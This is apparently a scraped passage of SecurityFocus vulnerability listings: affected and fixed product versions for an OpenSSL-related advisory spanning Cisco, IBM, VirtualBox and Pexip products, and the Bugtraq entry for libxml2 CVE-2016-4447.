Updated: Nov 15 2016 12:05AM
Credit: Shi Lei (Gear Team, Qihoo 360 Inc.)

Vulnerable: Pexip Pexip Infinity 9.1
Pexip Pexip Infinity 9
Pexip Pexip Infinity 8.1
Pexip Pexip Infinity 8
Pexip Pexip Infinity 7
Pexip Pexip Infinity 6
Pexip Pexip Infinity 5
Pexip Pexip Infinity 4
Pexip Pexip Infinity 12.2
Pexip Pexip Infinity 12.1
Pexip Pexip Infinity 12
Pexip Pexip Infinity 11.1
Pexip Pexip Infinity 11
Pexip Pexip Infinity 10.2
Pexip Pexip Infinity 10.1
Pexip Pexip Infinity 10
Oracle VM VirtualBox 5.0.26
Oracle VM VirtualBox 5.0.22
Oracle VM VirtualBox 5.0.16
Oracle VM VirtualBox 5.0.14
Oracle VM VirtualBox 5.0.13
Oracle VM VirtualBox 5.0.12
Oracle VM VirtualBox 5.0.11
Oracle VM VirtualBox 5.0.10
Oracle VM VirtualBox 5.0.9
Oracle VM VirtualBox 5.0.8
Oracle VM VirtualBox 4.3.36
Oracle VM VirtualBox 4.3.35
Oracle VM VirtualBox 4.3.34
Oracle VM VirtualBox 4.3.33
Oracle VM VirtualBox 4.3.32
Oracle VM VirtualBox 4.3.26
Oracle VM VirtualBox 4.3.19
Oracle VM VirtualBox 4.3.18
Oracle VM VirtualBox 4.3.17
Oracle VM VirtualBox 4.3.16
Oracle VM VirtualBox 4.3.15
Oracle VM VirtualBox 4.3.14
Oracle VM VirtualBox 4.3.12
Oracle VM VirtualBox 4.3.10
Oracle VM VirtualBox 4.3.9
Oracle VM VirtualBox 4.3.8
Oracle VM VirtualBox 4.3.7
Oracle VM VirtualBox 4.3.5
Oracle VM VirtualBox 4.2.36
Oracle VM VirtualBox 4.2.35
Oracle VM VirtualBox 4.2.34
Oracle VM VirtualBox 4.2.30
Oracle VM VirtualBox 4.2.27
Oracle VM VirtualBox 4.2.26
Oracle VM VirtualBox 4.2.24
Oracle VM VirtualBox 4.2.23
Oracle VM VirtualBox 4.2.19
Oracle VM VirtualBox 4.2.18
Oracle VM VirtualBox 4.2.14
Oracle VM VirtualBox 4.2.12
Oracle VM VirtualBox 4.2
Oracle VM VirtualBox 4.1.44
Oracle VM VirtualBox 4.1.43
Oracle VM VirtualBox 4.1.42
Oracle VM VirtualBox 4.1.38
Oracle VM VirtualBox 4.1.35
Oracle VM VirtualBox 4.1.34
Oracle VM VirtualBox 4.1.32
Oracle VM VirtualBox 4.1.31
Oracle VM VirtualBox 4.1.29
Oracle VM VirtualBox 4.1.28
Oracle VM VirtualBox 4.1.24
Oracle VM VirtualBox 4.1.22
Oracle VM VirtualBox 4.1.20
Oracle VM VirtualBox 4.1.18
Oracle VM VirtualBox 4.1.16
Oracle VM VirtualBox 4.1.14
Oracle VM VirtualBox 4.1.10
Oracle VM VirtualBox 4.1.8
Oracle VM VirtualBox 4.0.36
Oracle VM VirtualBox 4.0.35
Oracle VM VirtualBox 4.0.34
Oracle VM VirtualBox 4.0.30
Oracle VM VirtualBox 4.0.27
Oracle VM VirtualBox 4.0.26
Oracle VM VirtualBox 4.0.24
Oracle VM VirtualBox 4.0.23
Oracle VM VirtualBox 4.0.21
Oracle VM VirtualBox 4.0.20
Oracle VM VirtualBox 4.0.18
Oracle VM VirtualBox 3.2.25
Oracle VM VirtualBox 3.2.24
Oracle VM VirtualBox 3.2.22
Oracle VM VirtualBox 3.2.21
Oracle VM VirtualBox 3.2.19
Oracle VM VirtualBox 3.2.18
Oracle VM VirtualBox 3.2.14
Oracle VM VirtualBox 3.0.1
Oracle VM VirtualBox 1.6.6
Oracle VM VirtualBox 5.0.18
Oracle VM VirtualBox 5.0
Oracle VM VirtualBox 4.3.6
Oracle VM VirtualBox 4.3.4
Oracle VM VirtualBox 4.3.2
Oracle VM VirtualBox 4.3.0
Oracle VM VirtualBox 4.2.8
Oracle VM VirtualBox 4.2.6
Oracle VM VirtualBox 4.2.4
Oracle VM VirtualBox 4.2.22
Oracle VM VirtualBox 4.2.20
Oracle VM VirtualBox 4.2.2
Oracle VM VirtualBox 4.2.16
Oracle VM VirtualBox 4.2.10
Oracle VM VirtualBox 4.2
Oracle VM VirtualBox 4.1.6
Oracle VM VirtualBox 4.1.4
Oracle VM VirtualBox 4.1.30
Oracle VM VirtualBox 4.1.26
Oracle VM VirtualBox 4.1.2
Oracle VM VirtualBox 4.1.0
Oracle VM VirtualBox 4.1
Oracle VM VirtualBox 4.0.8
Oracle VM VirtualBox 4.0.6
Oracle VM VirtualBox 4.0.4
Oracle VM VirtualBox 4.0.22
Oracle VM VirtualBox 4.0.2
Oracle VM VirtualBox 4.0.16
Oracle VM VirtualBox 4.0.14
Oracle VM VirtualBox 4.0.12
Oracle VM VirtualBox 4.0.10
Oracle VM VirtualBox 4.0.0
Oracle VM VirtualBox 4.0
Oracle VM VirtualBox 3.3
Oracle VM VirtualBox 3.2.8
Oracle VM VirtualBox 3.2.6
Oracle VM VirtualBox 3.2.4
Oracle VM VirtualBox 3.2.20
Oracle VM VirtualBox 3.2.2
Oracle VM VirtualBox 3.2.16
Oracle VM VirtualBox 3.2.12
Oracle VM VirtualBox 3.2.10
Oracle VM VirtualBox 3.2.0
Oracle VM VirtualBox 3.2
Oracle VM VirtualBox 3.1.8
Oracle VM VirtualBox 3.1.6
Oracle VM VirtualBox 3.1.4
Oracle VM VirtualBox 3.1.2
Oracle VM VirtualBox 3.1.0
Oracle VM VirtualBox 3.1
Oracle VM VirtualBox 3.0.8
Oracle VM VirtualBox 3.0.6
Oracle VM VirtualBox 3.0.4
Oracle VM VirtualBox 3.0.2
Oracle VM VirtualBox 3.0.14
Oracle VM VirtualBox 3.0.12
Oracle VM VirtualBox 3.0.10
Oracle VM VirtualBox 3.0.0
Oracle VM VirtualBox 2.2.4
Oracle VM VirtualBox 2.2.2
Oracle VM VirtualBox 2.2.0
Oracle VM VirtualBox 2.2
Oracle VM VirtualBox 2.1.4
Oracle VM VirtualBox 2.1.2
Oracle VM VirtualBox 2.1.0
Oracle VM VirtualBox 2.0.8
Oracle VM VirtualBox 2.0.6
Oracle VM VirtualBox 2.0.4
Oracle VM VirtualBox 2.0.2
Oracle VM VirtualBox 2.0.12
Oracle VM VirtualBox 2.0.10
Oracle VM VirtualBox 2.0.0
Oracle VM VirtualBox 1.6.4
Oracle VM VirtualBox 1.6.2
Oracle VM VirtualBox 1.6.0
Oracle VM VirtualBox 1.6
OpenSSL Project OpenSSL 1.1
OpenSSL Project OpenSSL 1.0.11
OpenSSL Project OpenSSL 1.0.2
OpenSSL Project OpenSSL 1.0.2h
OpenSSL Project OpenSSL 1.0.2g
OpenSSL Project OpenSSL 1.0.2f
OpenSSL Project OpenSSL 1.0.2e
OpenSSL Project OpenSSL 1.0.2d
OpenSSL Project OpenSSL 1.0.2c
OpenSSL Project OpenSSL 1.0.2b
OpenSSL Project OpenSSL 1.0.2a
OpenSSL Project OpenSSL 1.0.1t
OpenSSL Project OpenSSL 1.0.1s
OpenSSL Project OpenSSL 1.0.1r
OpenSSL Project OpenSSL 1.0.1q
OpenSSL Project OpenSSL 1.0.1p
OpenSSL Project OpenSSL 1.0.1o
OpenSSL Project OpenSSL 1.0.1n
OpenSSL Project OpenSSL 1.0.1m
OpenSSL Project OpenSSL 1.0.1l
OpenSSL Project OpenSSL 1.0.1k
OpenSSL Project OpenSSL 1.0.1j
OpenSSL Project OpenSSL 1.0.1i
OpenSSL Project OpenSSL 1.0.1h
OpenSSL Project OpenSSL 1.0.1g
OpenSSL Project OpenSSL 1.0.1f
OpenSSL Project OpenSSL 1.0.1e
OpenSSL Project OpenSSL 1.0.1d
OpenSSL Project OpenSSL 1.0.1c
OpenSSL Project OpenSSL 1.0.1b
OpenSSL Project OpenSSL 1.0.1a
OpenSSL Project OpenSSL 1.0.1
IBM Sterling Connect:Express for UNIX 1.5.0.9
IBM Sterling Connect:Express for UNIX 1.5.0.13
IBM Sterling Connect:Express for UNIX 1.5.0.12
IBM Sterling Connect:Express for UNIX 1.5.0.11
IBM Sterling Connect:Express for UNIX 1.5.0
IBM Sterling Connect:Express for UNIX 1.4.6
IBM Sterling Connect:Express for UNIX 1.4
IBM SDK for Node.js 6.6.0.0
IBM SDK for Node.js 6.2.0.0
IBM SDK for Node.js 6.1.0.0
IBM SDK for Node.js 6.0.0.0
IBM SDK for Node.js 4.5.0.0
IBM SDK for Node.js 4.4.6.0
IBM SDK for Node.js 4.4.5.0
IBM SDK for Node.js 4.4.4.0
IBM SDK for Node.js 4.4.3.0
IBM SDK for Node.js 4.4.2.0
IBM SDK for Node.js 4.4.1.0
IBM SDK for Node.js 4.4.0.0
IBM SDK for Node.js 4.3.2.0
IBM SDK for Node.js 4.3.1.0
IBM SDK for Node.js 1.2.0.9
IBM SDK for Node.js 1.2.0.8
IBM SDK for Node.js 1.2.0.4
IBM SDK for Node.js 1.2.0.3
IBM SDK for Node.js 1.2.0.2
IBM SDK for Node.js 1.2.0.14
IBM SDK for Node.js 1.2.0.13
IBM SDK for Node.js 1.2.0.12
IBM SDK for Node.js 1.2.0.11
IBM SDK for Node.js 1.2.0.10
IBM SDK for Node.js 1.2.0.1
IBM SDK for Node.js 1.1.1.3
IBM SDK for Node.js 1.1.1.2
IBM SDK for Node.js 1.1.1.1
IBM SDK for Node.js 1.1.1.0
IBM SDK for Node.js 1.1.0.9
IBM SDK for Node.js 1.1.0.7
IBM SDK for Node.js 1.1.0.6
IBM SDK for Node.js 1.1.0.5
IBM SDK for Node.js 1.1.0.3
IBM SDK for Node.js 1.1.0.21
IBM SDK for Node.js 1.1.0.20
IBM SDK for Node.js 1.1.0.2
IBM SDK for Node.js 1.1.0.19
IBM SDK for Node.js 1.1.0.18
IBM SDK for Node.js 1.1.0.15
IBM SDK for Node.js 1.1.0.14
IBM SDK for Node.js 1.1.0.13
IBM SDK for Node.js 1.1.0.12
IBM SDK for Node.js 1.1
IBM Rational Application Developer for WebSphere Software 9.5
IBM Rational Application Developer for WebSphere Software 9.1
IBM i 7.3
IBM i 7.2
IBM i 7.1
IBM BigFix Remote Control 9.1.2
Cisco Wide Area Application Services (WAAS) 0
Cisco WebEx Node for MCS 0
Cisco WebEx Meetings Server - Multimedia Platform (MMP) 0
Cisco WebEx Meetings Server 2.0
Cisco WebEx Meetings Server 1.0
Cisco WebEx Meetings for Windows Phone 8 0
Cisco WebEx Meetings for BlackBerry 0
Cisco WebEx Meetings for Android 0
Cisco WebEx Meetings Client - On-Premises 0
Cisco WebEx Meetings Client - Hosted 0
Cisco WebEx Meeting Center 0
Cisco WebEx Business Suite 0
Cisco Web Security Appliance (WSA) 0
Cisco Visual Quality Experience Tools Server 0
Cisco Visual Quality Experience Server 0
Cisco Virtualization Experience Media Edition 0
Cisco Virtual Security Gateway 0
Cisco Videoscape Control Suite 0
Cisco Videoscape AnyRes Live 0
Cisco Video Surveillance PTZ IP Cameras 0
Cisco Video Surveillance Media Server 0
Cisco Video Surveillance 7000 Series IP Cameras 0
Cisco Video Surveillance 6000 Series IP Cameras 0
Cisco Video Surveillance 4300E and 4500E High-Definition IP Cameras 0
Cisco Video Surveillance 4000 Series High-Definition IP Cameras 0
Cisco Video Surveillance 3000 Series IP Cameras 0
Cisco Video Distribution Suite for Internet Streaming (VDS-IS/CDS-IS) 0
Cisco Universal Small Cell Iuh 0
Cisco Universal Small Cell CloudBase Factory Recovery Root Filesystem 2.99.4
Cisco Universal Small Cell CloudBase Factory Recovery Root Filesystem 0
Cisco Universal Small Cell 7000 Series 3.4.2.0
Cisco Universal Small Cell 5000 Series 3.4.2.0
Cisco Universal Small Cell 5000 Series 0
Cisco Unity Express 0
Cisco Unity Connection 0
Cisco Unified Workforce Optimization - Quality Management Solution 0
Cisco Unified Workforce Optimization 0
Cisco Unified SIP Proxy Software 0
Cisco Unified MeetingPlace 0
Cisco Unified IP 9971 Phone 0
Cisco Unified IP 9951 Phone 0
Cisco Unified IP 8961 Phone 0
Cisco Unified IP 8945 Phone 0
Cisco Unified IP 8831 Conference Phone for Third-Party Call Control 0
Cisco Unified IP 8831 Conference Phone 0
Cisco Unified IP 7900 Series Phones 0
Cisco Unified IP 6945 Phone 0
Cisco Unified IP 6901 Phone 0
Cisco Unified Intelligent Contact Management Enterprise 0
Cisco Unified Intelligence Center 0
Cisco Unified Contact Center Express 0
Cisco Unified Contact Center Enterprise 0
Cisco Unified Communications Manager Session Management Edition 0
Cisco Unified Communications Manager IM & Presence Service (formerly C 0
Cisco Unified Communications Manager (CUCM) 0
Cisco Unified Communications Domain Manager 0
Cisco Unified Attendant Console Premium Edition 0
Cisco Unified Attendant Console Enterprise Edition 0
Cisco Unified Attendant Console Department Edition 0
Cisco Unified Attendant Console Business Edition 0
Cisco Unified Attendant Console Advanced 0
Cisco UCS Standalone C-Series Rack Server - Integrated Management Cont 0
Cisco UCS Manager 0
Cisco UCS Director 0
Cisco UCS Central Software 0
Cisco UCS B-Series Blade Servers 0
Cisco UCS 6200 Series and 6300 Series Fabric Interconnects 0
Cisco UC Integration for Microsoft Lync 0
Cisco TelePresence Video Communication Server (VCS) 0
Cisco TelePresence TX9000 Series 0
Cisco TelePresence System TX1310 0
Cisco TelePresence System EX Series 0
Cisco TelePresence System 500-37 0
Cisco TelePresence System 500-32 0
Cisco TelePresence System 3000 Series 0
Cisco TelePresence System 1300 0
Cisco TelePresence System 1100 0
Cisco TelePresence System 1000 0
Cisco TelePresence SX Series 0
Cisco TelePresence Supervisor MSE 8050 0
Cisco TelePresence Server on Virtual Machine 0
Cisco TelePresence Server on Multiparty Media 820 0
Cisco TelePresence Server on Multiparty Media 310 and 320 0
Cisco TelePresence Server 7010 and MSE 8710 0
Cisco TelePresence Serial Gateway Series 0
Cisco TelePresence Profile Series 0
Cisco TelePresence MX Series 0
Cisco TelePresence MCU 0
Cisco TelePresence ISDN Link 0
Cisco TelePresence ISDN Gateway MSE 8321 0
Cisco TelePresence ISDN Gateway 3241 0
Cisco TelePresence Integrator C Series 0
Cisco TelePresence Content Server 0
Cisco TelePresence Conductor 0
Cisco TAPI Service Provider (TSP) 0
Cisco Tandberg Codian MSE 8320 0
Cisco Tandberg Codian ISDN Gateway 0
Cisco StealthWatch UDP Director 0
Cisco StealthWatch Management Console (SMC) 0
Cisco StealthWatch IDentity 0
Cisco StealthWatch FlowCollector sFlow 0
Cisco StealthWatch FlowCollector NetFlow 0
Cisco SPA525G 5-Line IP Phone 0
Cisco SPA232D Multi-Line DECT Analog Telephone Adapter (ATA) 0
Cisco SPA122 Analog Telephone Adapter (ATA) with Router 0
Cisco SPA112 2-Port Phone Adapter 0
Cisco SocialMiner 0
Cisco Smart Net Total Care - Local Collector appliance 0
Cisco Smart Care 0
Cisco Small Business 300 Series (Sx300) Managed Switches 0
Cisco Show and Share 0
Cisco Services Provisioning Platform 0
Cisco Security Manager 0
Cisco Secure Access Control System (ACS) 0
Cisco Registered Envelope Service 0
Cisco Proactive Network Operations Center 0
Cisco Prime Performance Manager 0
Cisco Prime Optical for Service Providers 0
Cisco Prime Network Services Controller 0
Cisco Prime Network 0
Cisco Prime License Manager 0
Cisco Prime IP Express 0
Cisco Prime Infrastructure Plug and Play Standalone Gateway 0
Cisco Prime Data Center Network Manager -
Cisco Prime Collaboration Provisioning 0
Cisco Prime Collaboration Deployment 0
Cisco Prime Collaboration Assurance 0
Cisco Prime Access Registrar 0
Cisco Partner Support Service 1.0
Cisco Paging Server (Informacast) 0
Cisco Paging Server 0
Cisco Packaged Contact Center Enterprise 0
Cisco ONS 15454 Series Multiservice Provisioning Platforms 0
Cisco onePK All-in-One Virtual Machine 0
Cisco Nexus 9000 Series Switches - Standalone NX-OS mode 0
Cisco Nexus 9000 Series Fabric Switches - ACI mode 0
Cisco Nexus 7000 Series Switches 0
Cisco Nexus 6000 Series Switches 0
Cisco Nexus 5000 Series Switches 0
Cisco Nexus 4000 Series Blade Switches 0
Cisco Nexus 1000V Series Switches 0
Cisco Network Performance Analysis 0
Cisco Network Analysis Module 0
Cisco NetFlow Generation Appliance 0
Cisco NAC Guest Server 0
Cisco NAC Appliance - Clean Access Server 0
Cisco NAC Appliance - Clean Access Manager 0
Cisco MXE 3500 Series Media Experience Engines 0
Cisco Multicast Manager 0
Cisco MediaSense 0
Cisco Media Services Interface 0
Cisco MDS 9000 Series Multilayer Switches 0
Cisco Management Appliance 0
Cisco Jabber Software Development Kit 0
Cisco Jabber Guest 0
Cisco Jabber for Windows 0
Cisco Jabber for Mac 0
Cisco Jabber for iPhone and iPad 0
Cisco Jabber for Android 0
Cisco Jabber Client Framework (JCF) Components 0
Cisco IP Interoperability and Collaboration System (IPICS) 0
Cisco IP 8800 Series Phones - VPN feature 0
Cisco IP 7800 Series Phones 0
Cisco Intrusion Prevention System (IPS) Solutions 0
Cisco InTracer 0
Cisco Hosted Collaboration Mediation Fulfillment 0
Cisco FireSIGHT System Software 0
Cisco Expressway series 0
Cisco Enterprise Content Delivery System (ECDS) 0
Cisco Emergency Responder 0
Cisco Email Security Appliance (ESA) 0
Cisco Edge 340 Digital Media Player 0
Cisco Edge 300 Digital Media Player 0
Cisco DX Series IP Phones 0
Cisco Content Security Management Appliance (SMA) 0
Cisco Content Security Appliance Update Servers 0
Cisco Connected Grid Routers 0
Cisco Computer Telephony Integration Object Server (CTIOS) 0
Cisco Common Services Platform Collector 0
Cisco Cloupia Unified Infrastructure Controller 0
Cisco Cloud Web Security 0
Cisco Cloud Object Storage 0
Cisco Clean Access Manager 0
Cisco ATA 190 Series Analog Terminal Adaptors 0
Cisco ATA 187 Analog Telephone Adaptor 0
Cisco ASR 5000 Series 0
Cisco ASA Next-Generation Firewall Services 0
Cisco Application Policy Infrastructure Controller (APIC) 0
Cisco Application and Content Networking System (ACNS) 0
Cisco AnyConnect Secure Mobility Client for Windows 0
Cisco AnyConnect Secure Mobility Client for Mac OS X 0
Cisco AnyConnect Secure Mobility Client for Linux 0
Cisco AnyConnect Secure Mobility Client for iOS 0
Cisco AnyConnect Secure Mobility Client for desktop platforms 0
Cisco AnyConnect Secure Mobility Client for Android 0
Cisco Aironet 2700 Series Access Points 0
Cisco Agent for OpenFlow 0
Cisco Agent Desktop for Cisco Unified Contact Center Express 0
Cisco Adaptive Security Appliance (ASA) 0
Cisco ACE30 Application Control Engine Module 0
Cisco ACE 4710 Application Control Engine 0
Cisco 910 Industrial Router 0
Cisco 500 Series Stackable (Sx500) Managed Switches 0
Cisco 4400 Series Digital Media Players 0
Cisco 4300 Series Digital Media Players 0
Cisco 220 Series Smart Plus (Sx220) Switches 0
CentOS CentOS 7
Not Vulnerable: Pexip Pexip Infinity 13
Oracle VM VirtualBox 5.1.8
Oracle VM VirtualBox 5.0.28
OpenSSL Project OpenSSL 1.1.0a
OpenSSL Project OpenSSL 1.0.2i
OpenSSL Project OpenSSL 1.0.1u
IBM Sterling Connect:Express for UNIX 1.5.0.13 iFix 150-13
IBM SDK for Node.js 6.7.0.0
IBM SDK for Node.js 4.6.0.0
IBM SDK for Node.js 1.2.0.15
IBM SDK for Node.js 1.1.1.4
IBM BigFix Remote Control 9.1.3
Cisco Wireless Lan Controller 8.4
Cisco WebEx Meetings Server 2.6.1.30
Cisco WebEx Meetings for Windows Phone 8 2.8
Cisco WebEx Meetings Client - On-Premises T32
Cisco WebEx Meetings Client - Hosted T32
Cisco WebEx Centers T32
Cisco Virtualization Experience Media Edition 11.8
Cisco Virtual Security Gateway 2.1.6
Cisco Videoscape AnyRes Live 9.7.2
Cisco Video Surveillance PTZ IP Cameras 2.9
Cisco Video Surveillance 7000 Series IP Cameras 2.9
Cisco Video Surveillance 6000 Series IP Cameras 2.9
Cisco Video Surveillance 4300E and 4500E High-Definition IP Cameras 2.9
Cisco Video Surveillance 4000 Series High-Definition IP Cameras 2.9
Cisco Video Surveillance 3000 Series IP Cameras 2.9
Cisco Video Distribution Suite for Internet Streaming (VDS-IS/CDS-IS) 4.003(002)
Cisco Universal Small Cell Iuh 3.17.3
Cisco Universal Small Cell CloudBase Factory Recovery Root Filesystem 3.17.3
Cisco Universal Small Cell 7000 Series 3.5.12.23
Cisco Universal Small Cell 5000 Series 3.5.12.23
Cisco Unity Express 10
Cisco Unified Workforce Optimization - Quality Management Solution 11.5(1)SU1
Cisco Unified SIP Proxy Software 10
Cisco Unified MeetingPlace 8.6MR1
Cisco Unified IP 8831 Conference Phone for Third-Party Call Control 9.3(4)SR3
Cisco Unified IP 8831 Conference Phone 10.3.1SR4
Cisco Unified IP 6901 Phone 9.3(1)SR3
Cisco Unified Intelligent Contact Management Enterprise 11.6.1
Cisco Unified Intelligence Center 11.6(1)
Cisco Unified Contact Center Express 11.6
Cisco Unified Contact Center Enterprise 11.6.1
Cisco UCS Standalone C-Series Rack Server - Integrated Management Cont 3.0
Cisco UCS B-Series Blade Servers 3.1.3
Cisco UC Integration for Microsoft Lync 11.6.3
Cisco TelePresence Video Communication Server (VCS) X8.8.3
Cisco TelePresence TX9000 Series 6.1
Cisco TelePresence System TX1310 6.1
Cisco TelePresence System EX Series TC7.3.7
Cisco TelePresence System EX Series CE8.2.2
Cisco Telepresence System 500-37 6.1
Cisco Telepresence System 500-32 6.1
Cisco TelePresence System 3000 Series 6.1
Cisco Telepresence System 1300 6.1
Cisco Telepresence System 1100 6.1
Cisco Telepresence System 1000 6.1
Cisco TelePresence SX Series TC7.3.7
Cisco TelePresence SX Series CE8.2.2
Cisco TelePresence Server on Multiparty Media 820 4.4
Cisco TelePresence Server on Multiparty Media 310 and 320 4.4
Cisco TelePresence Server 7010 and MSE 8710 4.4
Cisco TelePresence Profile Series TC7.3.7
Cisco TelePresence Profile Series CE8.2.2
Cisco TelePresence MX Series TC7.3.7
Cisco TelePresence MX Series CE8.2.2
Cisco TelePresence MCU 4.5(1.89)
Cisco TelePresence Integrator C Series TC7.3.7
Cisco TelePresence Integrator C Series CE8.2.2
Cisco SPA232D Multi-Line DECT Analog Telephone Adapter (ATA) 1.4.2
Cisco SPA122 Analog Telephone Adapter (ATA) with Router 1.4.2
Cisco SPA112 2-Port Phone Adapter 1.4.2
Cisco Services Provisioning Platform SFP1.1
Cisco Security Manager 4.13
Cisco Secure Access Control System (ACS) 5.8.0.32.8
Cisco Secure Access Control System (ACS) 5.8.0.32.7
Cisco Prime Performance Manager 1.7 SP1611
Cisco Prime Network Services Controller 1.01u
Cisco Prime Network Registrar 8.3.5
Cisco Prime Network Registrar 9.0
Cisco Prime Network 431
Cisco Prime Infrastructure 3.2
Cisco Prime Collaboration Provisioning 11.6
Cisco Prime Collaboration Assurance 11.6
Cisco ONS 15454 Series Multiservice Provisioning Platforms 10.7
Cisco Nexus 9000 Series Switches - Standalone NX-OS mode 7.0(3)I5(1)
Cisco Nexus 9000 Series Fabric Switches - ACI mode 0
Cisco Nexus 7000 Series Switches 6.2.19
Cisco Nexus 7000 Series Switches 5.2.8(i)
Cisco Nexus 6000 Series Switches 6.2.19
Cisco Nexus 6000 Series Switches 5.2.8(i)
Cisco Nexus 5000 Series Switches 6.2.19
Cisco Nexus 5000 Series Switches 5.2.8(i)
Cisco Nexus 4000 Series Blade Switches 4.1(2)E1(1r)
Cisco Nexus 1000V Series Switches 5.2(1)SV3(2.5)
Cisco Network Analysis Module 6.2(2)
Cisco Network Analysis Module 6.2(1-b)
Cisco NetFlow Generation Appliance 1.1(1)
Cisco MDS 9000 Series Multilayer Switches 6.2.19
Cisco MDS 9000 Series Multilayer Switches 5.2.8(i)
Cisco Jabber Software Development Kit 11.8
Cisco Jabber Guest 11
Cisco Jabber for Windows 11.8
Cisco Jabber for Mac 11.8
Cisco Jabber for iPhone and iPad 11.8
Cisco Jabber for Android 11.8
Cisco Jabber Client Framework (JCF) Components 11.8
Cisco IP Interoperability and Collaboration System (IPICS) 5.0(1)
Cisco IOS and Cisco IOS XE Software 16.4
Cisco IOS and Cisco IOS XE Software 16.3
Cisco IOS and Cisco IOS XE Software 16.2
Cisco IOS and Cisco IOS XE Software 16.1
Cisco IOS and Cisco IOS XE Software 15.5(3)
Cisco FireSIGHT System Software 6.1.0.1
Cisco FireSIGHT System Software 6.0.1.3
Cisco FireSIGHT System Software 5.4.1.9
Cisco FireSIGHT System Software 5.4.0.10
Cisco Expressway series X8.8.3
Cisco Enterprise Content Delivery System (ECDS) 2.6.9
Cisco Email Security Appliance (ESA) 10.0.1
Cisco Edge 340 Digital Media Player 1.2RB1.0.3
Cisco Edge 300 Digital Media Player 1.6RB5
Cisco Digital Media Manager 5.4.1_RB4
Cisco Digital Media Manager 5.3.6_RB3
Cisco DCM Series D9900 Digital Content Manager 0
Cisco Content Security Management Appliance (SMA) 6.1.140
Cisco Connected Grid Routers 15.8.9
Cisco Connected Grid Routers 7.3
Cisco Computer Telephony Integration Object Server (CTIOS) 11.6.1
Cisco Common Services Platform Collector 1.11
Cisco ATA 190 Series Analog Terminal Adaptors 1.3
Cisco ASR 5000 Series 21.2
Cisco ASA Next-Generation Firewall Services 2.1.2
Cisco Application Policy Infrastructure Controller (APIC) 2.2(1)
Cisco AnyConnect Secure Mobility Client for Windows 4.0.7
Cisco AnyConnect Secure Mobility Client for Mac OS X 4.0.7
Cisco AnyConnect Secure Mobility Client for Linux 4.0.7
Cisco AnyConnect Secure Mobility Client for iOS 4.0.7
Cisco AnyConnect Secure Mobility Client for desktop platforms 4.3.4
Cisco AnyConnect Secure Mobility Client for desktop platforms 4.4
Cisco AnyConnect Secure Mobility Client for Android 4.0.7
Cisco Aironet 2700 Series Access Points 16.4
Cisco Aironet 2700 Series Access Points 16.3
Cisco Aironet 2700 Series Access Points 16.2
Cisco Aironet 2700 Series Access Points 16.1
Cisco Aironet 2700 Series Access Points 15.5(3)
Cisco 910 Industrial Router 1.2.1RB4
Cisco 4400 Series Digital Media Players 5.4.1_RB4
Cisco 4400 Series Digital Media Players 5.3.6_RB3
Cisco 4300 Series Digital Media Players 5.4.1_RB4
Cisco 4300 Series Digital Media Players 5.3.6_RB3


SecurityFocus Vulnerabilities

Bugtraq ID: 90864
Class: Failure to Handle Exceptional Conditions
CVE: CVE-2016-4447
Remote: Yes
Local: No
Published: May 23 2016 12:00AM
Updated: Sep 30 2016 12:02AM
Credit: David Kilzer
Vulnerable: XMLSoft Libxml2 2.9
XMLSoft Libxml2 2.7.8
XMLSoft Libxml2 2.7.7
XMLSoft Libxml2 2.7.6
XMLSoft Libxml2 2.7.5
XMLSoft Libxml2 2.7.4
XMLSoft Libxml2 2.7.3
XMLSoft Libxml2 2.7.2
XMLSoft Libxml2 2.7.1
XMLSoft Libxml2 2.7
XMLSoft Libxml2 2.6.32
XMLSoft Libxml2 2.6.31
XMLSoft Libxml2 2.6.30
XMLSoft Libxml2 2.6.26
XMLSoft Libxml2 2.6.24
XMLSoft Libxml2 2.6.23
XMLSoft Libxml2 2.6.22
XMLSoft Libxml2 2.6.21
XMLSoft Libxml2 2.6.20
XMLSoft Libxml2 2.6.18
XMLSoft Libxml2 2.6.17
XMLSoft Libxml2 2.6.16
XMLSoft Libxml2 2.6.15
XMLSoft Libxml2 2.6.14
XMLSoft Libxml2 2.6.13
XMLSoft Libxml2 2.6.12
XMLSoft Libxml2 2.6.11
XMLSoft Libxml2 2.6.9
XMLSoft Libxml2 2.6.8
XMLSoft Libxml2 2.6.7
XMLSoft Libxml2 2.6.6
XMLSoft Libxml2 2.6.5
XMLSoft Libxml2 2.6.4
XMLSoft Libxml2 2.6.3
XMLSoft Libxml2 2.6.2
XMLSoft Libxml2 2.6.1
XMLSoft Libxml2 2.5.11
XMLSoft Libxml2 2.5.10
XMLSoft Libxml2 2.5.8
XMLSoft Libxml2 2.5.4
XMLSoft Libxml2 2.5.1
XMLSoft Libxml2 2.4.30
XMLSoft Libxml2 2.4.29
XMLSoft Libxml2 2.4.28
XMLSoft Libxml2 2.4.27
XMLSoft Libxml2 2.4.26
XMLSoft Libxml2 2.4.24
XMLSoft Libxml2 2.4.23
XMLSoft Libxml2 2.4.22
XMLSoft Libxml2 2.4.21
XMLSoft Libxml2 2.4.20
XMLSoft Libxml2 2.4.19
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
XMLSoft Libxml2 2.4.18
XMLSoft Libxml2 2.4.17
XMLSoft Libxml2 2.4.16
XMLSoft Libxml2 2.4.15
XMLSoft Libxml2 2.4.14
XMLSoft Libxml2 2.4.13
XMLSoft Libxml2 2.4.12
XMLSoft Libxml2 2.4.11
XMLSoft Libxml2 2.4.10
XMLSoft Libxml2 2.4.9
XMLSoft Libxml2 2.4.8
XMLSoft Libxml2 2.4.7
XMLSoft Libxml2 2.4.6
XMLSoft Libxml2 2.4.5
XMLSoft Libxml2 2.4.4
XMLSoft Libxml2 2.4.3
XMLSoft Libxml2 2.4.2
XMLSoft Libxml2 2.3.14
XMLSoft Libxml2 2.3.13
XMLSoft Libxml2 2.3.12
XMLSoft Libxml2 2.3.10
XMLSoft Libxml2 2.3.8
XMLSoft Libxml2 2.3.7
XMLSoft Libxml2 2.3.6
XMLSoft Libxml2 2.3.5
XMLSoft Libxml2 2.3.4
XMLSoft Libxml2 2.2.11
XMLSoft Libxml2 2.2.10
XMLSoft Libxml2 2.2.7
XMLSoft Libxml2 2.2.6
XMLSoft Libxml2 2.2.5
XMLSoft Libxml2 2.2.4
XMLSoft Libxml2 2.2.3
XMLSoft Libxml2 1.8.14
XMLSoft Libxml2 1.8.10
XMLSoft Libxml2 1.8.9
XMLSoft Libxml2 1.8.5
